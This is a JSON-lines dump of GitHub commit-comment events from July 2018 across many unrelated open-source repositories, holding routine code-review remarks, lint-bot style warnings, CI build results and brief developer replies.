{"id":"7938512177","type":"CommitCommentEvent","actor":{"login":"everslick"},"repo":{"name":"espressif/arduino-esp32"},"payload":{"comment":{"id":29643932,"position":null,"line":null,"path":null,"commit_id":"8afdd71b3a3498caf14edb9866c8cff332889c6a","created_at":"2018-07-09T15:49:15Z","updated_at":"2018-07-09T15:49:15Z","author_association":"COLLABORATOR","body":"\"AP_PROBEREQRECVED\" has really two different event numbers? could we add a comment that explains this? otherwise this might easily look like an error."}},"created_at":"2018-07-09T15:49:15Z"}
{"id":"7938514640","type":"CommitCommentEvent","actor":{"login":"zoffixznet"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":29643936,"position":null,"line":null,"path":null,"commit_id":"93af3eac56d9610edb1199f7203771e4029dc301","created_at":"2018-07-09T15:49:39Z","updated_at":"2018-07-09T15:49:39Z","author_association":"MEMBER","body":"FWIW there's plenty of other instances:\r\n\r\n```\r\n$ G '‽' doc/\r\ndoc/Type/Sub.pod6:41:    sub Int(Str $s){'oi‽'};\r\ndoc/Type/Sub.pod6:43:    # OUTPUT: «[(Int) 42 oi‽]␤»\r\ndoc/Type/Sub.pod6:67:    sub bar() is foo<oi‽> {\r\ndoc/Type/Sub.pod6:71:    # OUTPUT: «⟨is foo⟩ has been called with ⟨oi‽⟩ on Sub|47563000␤start␤bar has been called␤»\r\ndoc/Type/List.pod6:258:        say 'oi‽' # dead code\r\ndoc/Language/functions.pod6:48:    sub ::(aname) { say 'oi‽' };\r\ndoc/Language/modules.pod6:119:    mmk('oi‽'); # OUTPUT: «ok 1 - ␤»\r\ndoc/Language/traps.pod6:846:my %h = V => 'oi‽', ::V => 42;\r\ndoc/Language/traps.pod6:848:# OUTPUT: «{:V(\"oi‽\"), :x(42)}␤»\r\ndoc/Language/traps.pod6:1749:say ‘Huh‽’     if %h<x y>:exists; # ← WRONG; returns a 2-item list\r\ndoc/Language/typesystem.pod6:96:        method this-is-c { put 'oi' x $!int ~ '‽' }\r\ndoc/Language/typesystem.pod6:107:    # OUTPUT: «oioioioioioioioioioi‽␤»\r\ndoc/Language/typesystem.pod6:164:    role R { method m { say 'oi‽' } }\r\ndoc/Language/typesystem.pod6:169:    # OUTPUT: «oi‽␤[True True]␤»\r\ndoc/Language/typesystem.pod6:575:    role R { method m { say 'oi‽' } };\r\n```\r\n\r\nAlso, if \"oi\" is being removed because it's silly or whatever, I've used \"meow\" in a bunch of places, in case that needs to be changed too:\r\n\r\n```\r\n$ G 'meow' doc/\r\ndoc/Type/Junction.pod6:54:    say    %h{one <foo meow>}:exists; # OUTPUT: «one(True, False)␤»\r\ndoc/Type/Junction.pod6:55:    say so %h{one <foo meow>}:exists; # OUTPUT: «True␤»\r\ndoc/Type/IO/CatHandle.pod6:167:(my $f2 = 'bar'.IO).spurt: 'meow';\r\ndoc/Type/IO/CatHandle.pod6:244:(my $f2 = 'bar'.IO).spurt: 'meow';\r\ndoc/Type/IO/CatHandle.pod6:304:(my $f2 = 'bar'.IO).spurt: 'meow';\r\ndoc/Type/IO/CatHandle.pod6:306:# OUTPUT: «(\"foo\", \"bar\", \"meow\").Seq␤»\r\ndoc/Type/IO/CatHandle.pod6:524:(my $f1 = 'foo'.IO).spurt: 'meow';\r\ndoc/Type/IO/CatHandle.pod6:533:    say .get;        # OUTPUT: «meow␤»\r\ndoc/Type/IO/CatHandle.pod6:552:(my $f2 = 'bar'.IO).spurt: ' meow';\r\ndoc/Type/IO/CatHandle.pod6:556:    say .readchars: 1000; # OUTPUT: «to meow␤»\r\ndoc/Type/IO/CatHandle.pod6:734:(my $f2 = 'bar'.IO).spurt: 'meow';\r\ndoc/Type/IO/CatHandle.pod6:736:# OUTPUT: «(\"foo\", \"bar\", \"meow\").Seq␤»\r\ndoc/Type/IO/Path.pod6:142:    \"foo/bar\".IO.add(\"meow\")    .resolve.relative.say; # OUTPUT: «foo/bar/meow␤»\r\ndoc/Type/IO/Path.pod6:143:    \"foo/bar\".IO.add(\"/meow\")   .resolve.relative.say; # OUTPUT: «foo/bar/meow␤»\r\ndoc/Type/IO/Path.pod6:144:    \"foo/bar\".IO.add(\"meow.txt\").resolve.relative.say; # OUTPUT: «foo/bar/meow.txt␤»\r\ndoc/Type/IO/Path.pod6:145:    \"foo/bar\".IO.add(\"../meow\") .resolve.relative.say; # OUTPUT: «foo/meow␤»\r\ndoc/Type/IO/Path.pod6:858:That is, C<mkdir \"foo/bar/ber/meow\"> will create C<foo>, C<foo/bar>, and C<foo/bar/ber>\r\ndoc/Type/IO.pod6:24:Also creates parent directories, as needed (similar to *nix utility C<mkdir> with C<-p> option); that is, C<mkdir \"foo/bar/ber/meow\"> will create C<foo>, C<foo/bar>, and C<foo/bar/ber>\r\ndoc/Type/IO.pod6:25:directories if they do not exist, as well as C<foo/bar/ber/meow>.\r\ndoc/Language/operators.pod6:2546:    sub meows { ++$ < 4 ?? fail 'out of meows!' !! '🐱' }\r\ndoc/Language/operators.pod6:2548:    sub meows-processor1 { meows() orelse .return } # return handled Failure\r\ndoc/Language/operators.pod6:2549:    sub meows-processor2 { meows() orelse fail $_ } # return re-armed Failure\r\ndoc/Language/operators.pod6:2550:    sub meows-processor3 {\r\ndoc/Language/operators.pod6:2552:        meows() andthen .say orelse ‘something's wrong’.say;\r\ndoc/Language/operators.pod6:2556:        given meows-processor1;\r\ndoc/Language/operators.pod6:2558:        given meows-processor2;\r\ndoc/Language/operators.pod6:2559:    meows-processor3;           # OUTPUT: «something's wrong␤»\r\ndoc/Language/operators.pod6:2560:    meows-processor3;           # OUTPUT: «🐱␤»\r\n```"}},"created_at":"2018-07-09T15:49:39Z"}
{"id":"7938516589","type":"CommitCommentEvent","actor":{"login":"tooptooptoop"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29643940,"position":null,"line":null,"path":null,"commit_id":"aa0a0d83fc4a036df53e297fae12b96fcde61a8a","created_at":"2018-07-09T15:49:58Z","updated_at":"2018-07-09T15:49:58Z","author_association":"NONE","body":"thanks"}},"created_at":"2018-07-09T15:49:58Z"}
{"id":"7938523250","type":"CommitCommentEvent","actor":{"login":"msmalik681"},"repo":{"name":"DCurrent/openbor"},"payload":{"comment":{"id":29643952,"position":null,"line":null,"path":null,"commit_id":"bb7ac714c0a50978ec0204824ed28c99604cc1af","created_at":"2018-07-09T15:51:04Z","updated_at":"2018-07-09T15:51:04Z","author_association":"COLLABORATOR","body":"@whitedragon0000 Sorry but the distortion issue is still there.  Really sorry I know your busy with your new job I just wanted everything working before you had to prioritise work.  Please don't over commit yourself."}},"created_at":"2018-07-09T15:51:04Z"}
{"id":"7938525963","type":"CommitCommentEvent","actor":{"login":"glamountain"},"repo":{"name":"glamountain/gnss-sdr"},"payload":{"comment":{"id":29643955,"position":null,"line":null,"path":null,"commit_id":"486ac195db380a6c23b6d7f3770674d53bbbb9d3","created_at":"2018-07-09T15:51:32Z","updated_at":"2018-07-09T15:51:32Z","author_association":"OWNER","body":"This commit adds a `Bayesian_estimator` class to the tracking libraries and adds an instance of that class to the header for the `Gps_L1_Ca_Kf_Tracking_cc` class, however the functionality provided by the `Bayesian_estimator` class is **not** yet implemented in `Gps_L1_Ca_Kf_Tracking_cc.cc` and will be implemented in a future commit."}},"created_at":"2018-07-09T15:51:32Z"}
{"id":"7938537470","type":"CommitCommentEvent","actor":{"login":"T1mpp4"},"repo":{"name":"Spirtix/android_device_huawei_HWPLK"},"payload":{"comment":{"id":29643977,"position":null,"line":null,"path":null,"commit_id":"180f7325402d1ceb713bc0ffff890e38d965796f","created_at":"2018-07-09T15:53:24Z","updated_at":"2018-07-09T15:53:24Z","author_association":"CONTRIBUTOR","body":"Sorry, you may need to rebuild the kernel if you want dt2w. Not sure if I built correct branch.\r\nNougat-stable should have this feature."}},"created_at":"2018-07-09T15:53:24Z"}
{"id":"7938538698","type":"CommitCommentEvent","actor":{"login":"sam6238"},"repo":{"name":"sam6238/Raspberry"},"payload":{"comment":{"id":29643979,"position":null,"line":null,"path":null,"commit_id":"78628b347c62664650ae075321a787117eeb5250","created_at":"2018-07-09T15:53:34Z","updated_at":"2018-07-09T15:53:34Z","author_association":"OWNER","body":"簡單使用firebase上傳功能"}},"created_at":"2018-07-09T15:53:34Z"}
{"id":"7938540290","type":"CommitCommentEvent","actor":{"login":"whitedragon0000"},"repo":{"name":"DCurrent/openbor"},"payload":{"comment":{"id":29643982,"position":null,"line":null,"path":null,"commit_id":"bb7ac714c0a50978ec0204824ed28c99604cc1af","created_at":"2018-07-09T15:53:49Z","updated_at":"2018-07-09T15:53:49Z","author_association":"COLLABORATOR","body":"Thanks. I answered you on chronocrash. We need to to some tests. BTW this is a sdl issue. "}},"created_at":"2018-07-09T15:53:49Z"}
{"id":"7938541864","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":29643986,"position":null,"line":null,"path":null,"commit_id":"93af3eac56d9610edb1199f7203771e4029dc301","created_at":"2018-07-09T15:54:04Z","updated_at":"2018-07-09T15:54:04Z","author_association":"CONTRIBUTOR","body":"Well, I think it was only needed in this place because it's the\nintroduction to a type (also, it was requested). If we start to remove that\nkind of things from everywhere, we won't get out of the $i, $j, $k, $foo,\n$bar circle.\n"}},"created_at":"2018-07-09T15:54:04Z"}
{"id":"7938543525","type":"CommitCommentEvent","actor":{"login":"mdcass"},"repo":{"name":"ecrmnn/collect.js"},"payload":{"comment":{"id":29643989,"position":null,"line":null,"path":null,"commit_id":"35d27df6b14d3ae03c5ea63ee975e94787fa29bf","created_at":"2018-07-09T15:54:21Z","updated_at":"2018-07-09T15:54:21Z","author_association":"NONE","body":"Will this nested dot functionality be brought into the `get()` method at any point?"}},"created_at":"2018-07-09T15:54:21Z"}
{"id":"7938543714","type":"CommitCommentEvent","actor":{"login":"apearson"},"repo":{"name":"chrisrocco/apartment-auto-caller"},"payload":{"comment":{"id":29643990,"position":null,"line":null,"path":null,"commit_id":"1283f3fe497f5dc2cae13dad054440019f519e48","created_at":"2018-07-09T15:54:23Z","updated_at":"2018-07-09T15:54:23Z","author_association":"NONE","body":"You know committing over a private variable doesn't remove it?"}},"created_at":"2018-07-09T15:54:23Z"}
{"id":"7938555212","type":"CommitCommentEvent","actor":{"login":"hehengwei"},"repo":{"name":"hehengwei/leetcode"},"payload":{"comment":{"id":29644020,"position":null,"line":null,"path":null,"commit_id":"1e3c88e6d1e54c608d75dad7abe4bf5c37c4ac76","created_at":"2018-07-09T15:56:17Z","updated_at":"2018-07-09T15:56:17Z","author_association":"OWNER","body":"还没有通过"}},"created_at":"2018-07-09T15:56:17Z"}
{"id":"7938556859","type":"CommitCommentEvent","actor":{"login":"Enygma2002"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29644022,"position":32,"line":3584,"path":"xwiki-platform-core/xwiki-platform-oldcore/src/main/java/com/xpn/xwiki/doc/XWikiDocument.java","commit_id":"e8208d08dd4d9be5143002d33ca8431f7decf90f","created_at":"2018-07-09T15:56:33Z","updated_at":"2018-07-09T15:56:33Z","author_association":"MEMBER","body":"I'm curious if the copy of the ID should respect the value of `keepsIdentity`. Normally, it should, and should only be copied if `keepsIdentity` is `true`.\r\n\r\nOn the other hand, I fail to see the utility of manipulating the `id` internal field (copying it, even setting it with `setId()`) when the getter always reinitializes it based on the document reference."}},"created_at":"2018-07-09T15:56:33Z"}
{"id":"7938559227","type":"CommitCommentEvent","actor":{"login":"icorules"},"repo":{"name":"icorules/envira_hacks"},"payload":{"comment":{"id":29644032,"position":null,"line":null,"path":null,"commit_id":"d199d8a17fd333b33c0d09afbe8056a212540326","created_at":"2018-07-09T15:56:58Z","updated_at":"2018-07-09T15:56:58Z","author_association":"OWNER","body":"This allows an adjustment of the Envira Base (Dark) lightbox's font sizing, weight, and text align."}},"created_at":"2018-07-09T15:56:58Z"}
{"id":"7938559824","type":"CommitCommentEvent","actor":{"login":"jims10d"},"repo":{"name":"jims10d/sportman-loopback"},"payload":{"comment":{"id":29644033,"position":null,"line":null,"path":null,"commit_id":"d0d5dbca5e842e6a62e03f4b60b4ceeaa7018f69","created_at":"2018-07-09T15:57:03Z","updated_at":"2018-07-09T15:57:03Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/5a7e57bc-5410-437d-95a5-d427815f5ebc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/db4be768-68e6-447f-9187-7d1ee9f620cc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\") deployed [sportman-loopback](https://github.com/jims10d/sportman-loopback/releases/tag/deploy-ibm-yp-us-south-jims10d-simpleSpace-20180709-155702 \"deploy-ibm-yp-us-south-jims10d-simpleSpace-20180709-155702\") to [simpleSpace](https://console.bluemix.net/apps/12384bdb-7ac1-45d2-b63b-7d0a3532c568?env_id=ibm:yp:us-south \"ibm:yp:us-south:jims10d:simpleSpace\"), including this commit"}},"created_at":"2018-07-09T15:57:03Z"}
{"id":"7938561859","type":"CommitCommentEvent","actor":{"login":"SpeedoWBT"},"repo":{"name":"Spirtix/android_device_huawei_HWPLK"},"payload":{"comment":{"id":29644036,"position":null,"line":null,"path":null,"commit_id":"180f7325402d1ceb713bc0ffff890e38d965796f","created_at":"2018-07-09T15:57:22Z","updated_at":"2018-07-09T15:57:22Z","author_association":"COLLABORATOR","body":"Yes , i did build nougat stable 3 weeks ago with 3.10.108 and it worked , i will try with the dt2w mods "}},"created_at":"2018-07-09T15:57:22Z"}
{"id":"7938574365","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29644064,"position":null,"line":null,"path":null,"commit_id":"00990367a1e06dd0a4773c9a48f1c820f9c456bc","created_at":"2018-07-09T15:59:28Z","updated_at":"2018-07-09T15:59:28Z","author_association":"COLLABORATOR","body":"Just one question : did you test your fix : https://bugs.limesurvey.org/view.php?id=13858 ?"}},"created_at":"2018-07-09T15:59:28Z"}
{"id":"7938576464","type":"CommitCommentEvent","actor":{"login":"robodude"},"repo":{"name":"vuejs/vue-cli"},"payload":{"comment":{"id":29644068,"position":null,"line":null,"path":null,"commit_id":"47794ae9046a056f37b023a95c933840c7d010ef","created_at":"2018-07-09T15:59:49Z","updated_at":"2018-07-09T15:59:49Z","author_association":"NONE","body":"I updated a brand new cli projects testMatch string to this proposed fix, and I wasn't able to get it working. I'm on windows 10 too"}},"created_at":"2018-07-09T15:59:49Z"}
{"id":"7938576533","type":"CommitCommentEvent","actor":{"login":"JohanEngelen"},"repo":{"name":"ldc-developers/druntime"},"payload":{"comment":{"id":29644069,"position":34,"line":215,"path":"src/rt/sections_android.d","commit_id":"5f7f87391bc8189500925adc938b257631352916","created_at":"2018-07-09T15:59:50Z","updated_at":"2018-07-09T15:59:50Z","author_association":"MEMBER","body":"very much in favor of giving these a correct pointer type here, and fixup our LLVM cpp code."}},"created_at":"2018-07-09T15:59:50Z"}
{"id":"7938584057","type":"CommitCommentEvent","actor":{"login":"Akryum"},"repo":{"name":"vuejs/vue-cli"},"payload":{"comment":{"id":29644085,"position":null,"line":null,"path":null,"commit_id":"47794ae9046a056f37b023a95c933840c7d010ef","created_at":"2018-07-09T16:01:02Z","updated_at":"2018-07-09T16:01:02Z","author_association":"MEMBER","body":"Could you try this one? https://github.com/vuejs/vue-cli/commit/96778b2caf873c2178caadb5a66ab6bded070e96#diff-29994942bb568c5548a12d8103751233R34"}},"created_at":"2018-07-09T16:01:02Z"}
{"id":"7938586394","type":"CommitCommentEvent","actor":{"login":"Pete-Wylie"},"repo":{"name":"Pete-Wylie/TestWar"},"payload":{"comment":{"id":29644092,"position":null,"line":null,"path":null,"commit_id":"1132442846e0efe58f62be10e586893fe5c5af78","created_at":"2018-07-09T16:01:25Z","updated_at":"2018-07-09T16:01:25Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-09T16:01:25Z"}
{"id":"7938587101","type":"CommitCommentEvent","actor":{"login":"timmywil"},"repo":{"name":"jquery/jquery"},"payload":{"comment":{"id":29644093,"position":8,"line":113,"path":"src/css.js","commit_id":"e743cbd28553267f955f71ea7248377915613fd9","created_at":"2018-07-09T16:01:31Z","updated_at":"2018-07-09T16:01:31Z","author_association":"MEMBER","body":"They're all test cases for 0. SVG results in NaN here, which results in the 0."}},"created_at":"2018-07-09T16:01:31Z"}
{"id":"7938587278","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29644094,"position":null,"line":null,"path":null,"commit_id":"3b8b32b56f7aad5f1a9c46fc05884924f9c53ba3","created_at":"2018-07-09T16:01:33Z","updated_at":"2018-07-09T16:01:33Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-437](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-437).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-437-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-09T16:01:33Z"}
{"id":"7938590300","type":"CommitCommentEvent","actor":{"login":"robodude"},"repo":{"name":"vuejs/vue-cli"},"payload":{"comment":{"id":29644098,"position":null,"line":null,"path":null,"commit_id":"47794ae9046a056f37b023a95c933840c7d010ef","created_at":"2018-07-09T16:02:04Z","updated_at":"2018-07-09T16:02:04Z","author_association":"NONE","body":"@Akryum Yeah, that works!"}},"created_at":"2018-07-09T16:02:04Z"}
{"id":"7938592387","type":"CommitCommentEvent","actor":{"login":"aszlig"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29644101,"position":9,"line":207,"path":"pkgs/stdenv/generic/setup.sh","commit_id":"94d164dd7f20c785a543d1fb1d5bd359fb38bd25","created_at":"2018-07-09T16:02:24Z","updated_at":"2018-07-09T16:02:24Z","author_association":"MEMBER","body":"@edolstra: What's the reason for this line? So if we someday get rid of `/bin/sh` within the builder this function will *always* return success, which is a bit confusing and not what I'd expect from an `isScript` function."}},"created_at":"2018-07-09T16:02:24Z"}
{"id":"7938594670","type":"CommitCommentEvent","actor":{"login":"mborgerson"},"repo":{"name":"mborgerson/xqemu"},"payload":{"comment":{"id":29644104,"position":null,"line":null,"path":null,"commit_id":"540316d1dbc4e6b41aed2302cc1167e5586d5a15","created_at":"2018-07-09T16:02:47Z","updated_at":"2018-07-09T16:02:47Z","author_association":"OWNER","body":"Thanks for the feedback. I'm not suggesting we skip these asserts, what I'm saying is that they need to be implemented properly for Halo:CE, that's why I put `[FIXME]` in the commit message."}},"created_at":"2018-07-09T16:02:47Z"}
{"id":"7938595584","type":"CommitCommentEvent","actor":{"login":"shankar-forgerock"},"repo":{"name":"ForgeRock/forgeops"},"payload":{"comment":{"id":29644105,"position":13,"line":14,"path":"docker/apache-agent/Dockerfile","commit_id":"da58c740e93e2f3e4511a4b3d7bf8b2699fba1f3","created_at":"2018-07-09T16:02:56Z","updated_at":"2018-07-09T16:02:56Z","author_association":"NONE","body":"Should the apache 2.4 agent be in /opt or in /var/tmp?"}},"created_at":"2018-07-09T16:02:56Z"}
{"id":"7938604861","type":"CommitCommentEvent","actor":{"login":"HemanthNarne"},"repo":{"name":"Kishan-Kalburgi/DisasterResponseAndReportingSystem-Backend"},"payload":{"comment":{"id":29644117,"position":null,"line":null,"path":null,"commit_id":"cefeba4b908e51a3e7b20cda86065143e754314e","created_at":"2018-07-09T16:04:34Z","updated_at":"2018-07-09T16:04:34Z","author_association":"COLLABORATOR","body":"Created members API"}},"created_at":"2018-07-09T16:04:34Z"}
{"id":"7938607403","type":"CommitCommentEvent","actor":{"login":"jpmn"},"repo":{"name":"MTI830PyTraders/TradingPlayground"},"payload":{"comment":{"id":29644124,"position":13,"line":13,"path":"collectTickList.py","commit_id":"ff02e1973cb4adc9149a727e335019f11f9a21ae","created_at":"2018-07-09T16:05:00Z","updated_at":"2018-07-09T16:05:00Z","author_association":"NONE","body":"Alternative :stuck_out_tongue: \r\n```\r\nticker, contry_code = row['ticker'].split('/')[1].split('_')[0:2]\r\n```"}},"created_at":"2018-07-09T16:05:00Z"}
{"id":"7938607687","type":"CommitCommentEvent","actor":{"login":"aleos89"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29644127,"position":null,"line":null,"path":null,"commit_id":"fdd247562257c90a997bde1f618e60f21651d317","created_at":"2018-07-09T16:05:03Z","updated_at":"2018-07-09T16:05:03Z","author_association":"CONTRIBUTOR","body":"I tested with Aster Card and my damage was increased as normal."}},"created_at":"2018-07-09T16:05:03Z"}
{"id":"7938612469","type":"CommitCommentEvent","actor":{"login":"TM0NEY46"},"repo":{"name":"TM0NEY46/hello-world"},"payload":{"comment":{"id":29644134,"position":6,"line":6,"path":"README.md","commit_id":"8a3b45ab42e66440a925ed4e821173f70bac41a8","created_at":"2018-07-09T16:05:54Z","updated_at":"2018-07-09T16:05:54Z","author_association":"OWNER","body":"I am particularly interested in learning the tools related to Data Analytics.  I plan to study tools and languages such as Hadoop, R, SAS, Python, SQL and others."}},"created_at":"2018-07-09T16:05:54Z"}
{"id":"7938612504","type":"CommitCommentEvent","actor":{"login":"ehmry"},"repo":{"name":"ehmry/genode"},"payload":{"comment":{"id":29644135,"position":null,"line":null,"path":null,"commit_id":"f23f5d1b8da29707a3658bd7074f49cdb3ba2bb2","created_at":"2018-07-09T16:05:54Z","updated_at":"2018-07-09T16:05:54Z","author_association":"OWNER","body":"@m-stein you can try this fixup, but the test still fails and I have to leave for the day."}},"created_at":"2018-07-09T16:05:54Z"}
{"id":"7938613734","type":"CommitCommentEvent","actor":{"login":"fguitton"},"repo":{"name":"dsi-icl/optimise-core"},"payload":{"comment":{"id":29644137,"position":null,"line":null,"path":null,"commit_id":"00bcc182816eabcf5a0595f394c3450104d623cc","created_at":"2018-07-09T16:06:07Z","updated_at":"2018-07-09T16:06:07Z","author_association":"MEMBER","body":"@epissari Can you explain what this commit is doing on this branch ? This is a branch that looks at fixing promise handling not dealing with database seeding ! 🚫 "}},"created_at":"2018-07-09T16:06:07Z"}
{"id":"7938628327","type":"CommitCommentEvent","actor":{"login":"muralivijay"},"repo":{"name":"SwapnilSoni1999/android_device_xiaomi_santoni"},"payload":{"comment":{"id":29644158,"position":null,"line":null,"path":null,"commit_id":"e305d000ae394452ad12250ae9950e58fdcd3d97","created_at":"2018-07-09T16:08:45Z","updated_at":"2018-07-09T16:08:45Z","author_association":"NONE","body":"don.t add it kernel must need cnss module and selinux must enforcing . tested my rolex crashing => https://github.com/muralivijay/android_device_xiaomi_rolex/commit/e5450272398167d91ba580028a0c3e3900e7aefe"}},"created_at":"2018-07-09T16:08:45Z"}
{"id":"7938634796","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"ecmwf/caliver"},"payload":{"comment":{"id":29644167,"position":null,"line":null,"path":null,"commit_id":"2d4fce7deb9697fd84bf53d3c4fe920a6ac6d516","created_at":"2018-07-09T16:09:58Z","updated_at":"2018-07-09T16:09:58Z","author_association":"NONE","body":"[R/anomaly.R:103:67:](https://github.com/ecmwf/caliver/blob/2d4fce7deb9697fd84bf53d3c4fe920a6ac6d516/R/anomaly.R#L103) *style:* **Put spaces around all infix operators.**\n```r\n​  legend(x = round(par(\"usr\")[2] + (par(\"usr\")[2] - par(\"usr\")[1])/90, 0),\n                                                                 ~^~\n```\n[R/ranking.R:78:67:](https://github.com/ecmwf/caliver/blob/2d4fce7deb9697fd84bf53d3c4fe920a6ac6d516/R/ranking.R#L78) *style:* **Put spaces around all infix operators.**\n```r\n​  legend(x = round(par(\"usr\")[2] + (par(\"usr\")[2] - par(\"usr\")[1])/90, 0),\n                                                                 ~^~\n```"}},"created_at":"2018-07-09T16:09:58Z"}
{"id":"7938635517","type":"CommitCommentEvent","actor":{"login":"n18023"},"repo":{"name":"n18023/programming-term2"},"payload":{"comment":{"id":29644168,"position":null,"line":null,"path":null,"commit_id":"cda3d1568796afd9b9a0e3f248799791a86ce5dd","created_at":"2018-07-09T16:10:06Z","updated_at":"2018-07-09T16:10:06Z","author_association":"OWNER","body":"金城先生\r\n\r\n御忙しい中,失礼致します。そういう事だったんですか。理解出来なくてすいません。教えてくれてありがとうございます。早急に訂正致します。  平敷大賀\r\n\r\n2018년 7월 9일 (월) 오후 11:11, kinjo-icolle <notifications@github.com>님이 작성:\r\n\r\n> 修正ありがとうございます。\r\n> ポイントカードの値引き部分の変数はそのままで良かったかな^^;\r\n> コメントと役割が一致していなかったことを指示しましたが、誤解を招いたみたいでした。すみません。\r\n>\r\n> ネタ明かしすると、僕なら値引き部分、下記のようにします。\r\n> 割引いた結果の率\r\n>\r\n> yakitori_w = 0.2\r\n> 値引きするポイント\r\n>\r\n> point_off = 150\r\n>\r\n> payment = (((beer_v * beer_c) + (otumami_v * otumami_c) + ((yakitori_v *\r\n> (1 - yakitori_w)) * yakitori_c)) - point_off)\r\n>\r\n> 参考までに。\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/n18023/programming-term2/commit/cda3d1568796afd9b9a0e3f248799791a86ce5dd#commitcomment-29642394>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/Alf58xKQQfCzlZEBzxQeFqUuKBl8lBiwks5uE2SQgaJpZM4VHx32>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-09T16:10:06Z"}
{"id":"7938637377","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29644170,"position":null,"line":null,"path":null,"commit_id":"a2d876b4df5a1b6da045bcd1f501d164a2429806","created_at":"2018-07-09T16:10:25Z","updated_at":"2018-07-09T16:10:25Z","author_association":"NONE","body":"#6763-Swimming-pool-flow-not-added-to-plant-loop-sizing (RKStrand) - Win64-Windows-7-VisualStudio-14: OK (2930 of 2931 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2d876b4df5a1b6da045bcd1f501d164a2429806-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2d876b4df5a1b6da045bcd1f501d164a2429806-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-09T16:10:25Z"}
{"id":"7938637564","type":"CommitCommentEvent","actor":{"login":"bolorundurowb"},"repo":{"name":"pisonpeakgroup/Google-Udacity-Scholarship-Challenge-app"},"payload":{"comment":{"id":29644172,"position":1,"line":1,"path":".idea/vcs.xml","commit_id":"e34a76e81312d8ed7e34adc0bf78b61053ac31ee","created_at":"2018-07-09T16:10:27Z","updated_at":"2018-07-09T16:10:27Z","author_association":"NONE","body":"you should not commit this file."}},"created_at":"2018-07-09T16:10:27Z"}
{"id":"7938638653","type":"CommitCommentEvent","actor":{"login":"bolorundurowb"},"repo":{"name":"pisonpeakgroup/Google-Udacity-Scholarship-Challenge-app"},"payload":{"comment":{"id":29644173,"position":1,"line":1,"path":".idea/vcs.xml","commit_id":"e34a76e81312d8ed7e34adc0bf78b61053ac31ee","created_at":"2018-07-09T16:10:41Z","updated_at":"2018-07-09T16:10:41Z","author_association":"NONE","body":"it is just for Android studio"}},"created_at":"2018-07-09T16:10:41Z"}
{"id":"7938642647","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"ecmwf/caliver"},"payload":{"comment":{"id":29644181,"position":null,"line":null,"path":null,"commit_id":"5646d4a5b7d1b9c56f3eb26c0a86b7f65b75ed70","created_at":"2018-07-09T16:11:23Z","updated_at":"2018-07-09T16:11:23Z","author_association":"NONE","body":"[R/anomaly.R:103:67:](https://github.com/ecmwf/caliver/blob/5646d4a5b7d1b9c56f3eb26c0a86b7f65b75ed70/R/anomaly.R#L103) *style:* **Put spaces around all infix operators.**\n```r\n​  legend(x = round(par(\"usr\")[2] + (par(\"usr\")[2] - par(\"usr\")[1])/90, 0),\n                                                                 ~^~\n```\n[R/ranking.R:78:67:](https://github.com/ecmwf/caliver/blob/5646d4a5b7d1b9c56f3eb26c0a86b7f65b75ed70/R/ranking.R#L78) *style:* **Put spaces around all infix operators.**\n```r\n​  legend(x = round(par(\"usr\")[2] + (par(\"usr\")[2] - par(\"usr\")[1])/90, 0),\n                                                                 ~^~\n```"}},"created_at":"2018-07-09T16:11:23Z"}
{"id":"7938644350","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29644184,"position":null,"line":null,"path":null,"commit_id":"baf72b2a32111f01d2909219e88e7a3aa41e34ce","created_at":"2018-07-09T16:11:42Z","updated_at":"2018-07-09T16:11:42Z","author_association":"COLLABORATOR","body":"Puzzle `747-d2018a51` disappeared from [`pom.xml`](https://github.com/zerocracy/farm/blob/master/pom.xml), that's why I closed #1088. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-09T16:11:42Z"}
